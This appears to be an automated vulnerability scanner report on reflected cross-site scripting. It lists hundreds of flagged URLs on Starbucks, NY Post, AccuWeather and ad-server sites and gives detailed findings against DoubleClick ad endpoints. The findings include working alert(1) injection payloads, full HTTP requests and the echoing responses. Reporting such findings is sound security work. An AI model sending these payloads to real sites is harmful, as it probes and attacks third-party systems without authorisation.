1.788. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

1.789. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

1.790. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

1.791. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

1.792. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

1.793. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

1.794. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

1.795. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

1.796. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

1.797. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

1.798. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

1.799. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

1.800. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

1.801. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

1.802. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

1.803. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

1.804. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

1.805. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

1.806. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

1.807. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

1.808. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

1.809. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

1.810. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

1.811. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.812. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.813. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.814. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

1.815. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

1.816. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

1.817. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

1.818. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

1.819. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

1.820. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

1.821. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

1.822. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

1.823. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

1.824. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

1.825. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

1.826. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

1.827. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

1.828. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

1.829. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

1.830. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

1.831. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

1.832. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

1.833. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

1.834. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

1.835. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

1.836. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

1.837. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

1.838. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

1.839. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

1.840. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

1.841. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

1.842. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

1.843. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

1.844. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

1.845. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

1.846. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

1.847. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

1.848. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

1.849. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

1.850. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

1.851. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

1.852. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

1.853. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

1.854. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

1.855. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

1.856. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

1.857. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

1.858. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

1.859. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

1.860. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

1.861. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

1.862. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

1.863. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

1.864. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

1.865. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

1.866. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

1.867. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

1.868. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

1.869. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

1.870. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

1.871. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

1.872. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

1.873. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

1.874. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.875. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.876. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

1.877. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

1.878. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.879. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.880. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

1.881. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

1.882. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

1.883. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

1.884. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

1.885. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

1.886. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

1.887. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

1.888. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

1.889. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

1.890. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

1.891. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

1.892. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

1.893. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

1.894. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

1.895. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

1.896. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

1.897. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

1.898. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

1.899. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

1.900. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

1.901. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

1.902. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

1.903. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

1.904. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

1.905. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

1.906. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

1.907. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

1.908. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

1.909. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

1.910. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

1.911. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

1.912. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

1.913. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

1.914. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

1.915. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

1.916. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

1.917. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

1.918. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

1.919. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

1.920. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

1.921. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

1.922. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

1.923. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

1.924. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

1.925. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

1.926. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

1.927. http://www.starbucks.com/search [keywords parameter]

1.928. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

1.929. http://www.starbucks.com/search/ [keywords parameter]

1.930. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

1.931. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

1.932. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

1.933. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

1.934. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

1.935. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

1.936. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

1.937. http://medienfreunde.com/ [Referer HTTP header]

1.938. http://remysharp.com/2007/01/25/jquery-tutorial-text-box-hints/ [Referer HTTP header]

1.939. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]

1.940. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

1.941. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

1.942. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.943. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.944. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]

1.945. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]



1. Cross-site scripting (reflected)
There are 945 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5697"-alert(1)-"859af6071e4 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7483

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retarge
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116b5"-alert(1)-"ab2c8675d53 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7563

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Sit
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e53b7"-alert(1)-"e8d8af3e077 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c02"-alert(1)-"5944b1be99f was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
